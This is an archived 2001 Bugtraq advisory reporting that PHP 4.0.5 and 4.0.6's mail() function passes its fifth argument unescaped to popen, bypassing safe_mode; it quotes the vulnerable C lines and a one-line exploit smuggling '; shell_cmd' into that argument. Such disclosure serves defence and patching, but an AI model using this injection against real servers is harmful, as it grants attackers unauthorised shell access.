Bugtraq mailing list archives

php mail function bypass safe_mode restriction

From: Laurent Sintes <sintes () nfrance com>
Date: Wed, 18 Jul 2001 02:53:57 +0200

php mail() function does not do check for escape shell commandes,
even if php is running in safe_mode.

So it's may be possible to bypass the safe_mode restriction and gain
shell access.

Affected:
php4.0.6
php4.0.5

Significatives lines of ext/standard/mail.c:

extra_cmd = (*argv[4])->value.str.val;
strcat (sendmail_cmd, extra_cmd);
sendmail = popen(sendmail_cmd, "w");


Exploit:
mail("toto () toto com",
         "test",
         "test",
         "test",
        "; shell_cmd");

Current thread:

php mail function bypass safe_mode restriction Laurent Sintes (Jul 18)
- Re: php mail function bypass safe_mode restriction Salim Gasmi (Jul 18)
  - Re: php mail function bypass safe_mode restriction Laurent Sintes (Jul 19)
- <Possible follow-ups>
- Re: php mail function bypass safe_mode restriction Laurent Sintes (Jul 19)
  - Re: php mail function bypass safe_mode restriction Jon Ribbens (Jul 19)
- Re: php mail function bypass safe_mode restriction Stuart Moore (Jul 19)